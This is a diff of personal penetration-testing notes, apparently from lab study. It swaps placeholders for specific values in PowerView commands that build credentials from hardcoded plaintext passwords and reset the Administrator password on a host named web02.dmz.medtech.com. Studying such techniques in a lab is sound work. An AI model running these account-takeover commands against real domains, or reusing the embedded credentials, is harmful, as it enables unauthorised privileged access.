justeslam/offsec2/notes/windows_enumeration.md

 # Create a PSCredential object with an account that has permissions to reset
 passwords
-$Cred = New-Object System.Management.Automation.PSCredential
-('DomainName\UserName', (ConvertTo-SecureString 'FGjksdff89sdfj' -AsPlainText
+$Cred = New-Object System.Management.Automation.PSCredential('web02.dmz.medtech.com\\Administrator', (ConvertTo-SecureString 'FGjksdff89sdfj' -AsPlainText -Force))
--Force))

 # Reset the password for the user 'nina'
-Set-DomainUserPassword -Identity 'nina' -AccountPassword $UserPassword
--Credential $Cred -Verbose
+Set-DomainUserPassword -Identity 'Administrator' -AccountPassword $UserPassword -Credential $Cred -Verbose

 # If you need to set the password for another user, repeat the process with the correct details
 # For example, for a user named 'User.Name':
 $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
-$Cred = New-Object System.Management.Automation.PSCredential('DomainName\User.Name', $SecPassword)
+$Cred = New-Object System.Management.Automation.PSCredential('web02\Administrator', $SecPassword)

 # Reset the password
-Set-DomainUserPassword -Identity 'User.Name' -AccountPassword $UserPassword
--Credential $Cred -Verbose
+Set-DomainUserPassword -Identity 'Administrator' -AccountPassword $UserPassword -Credential $Cred -Verbose

 # Optionally, if you need to set a script path for the user object
 # Replace <User.Name>, $ip, <file> with actual values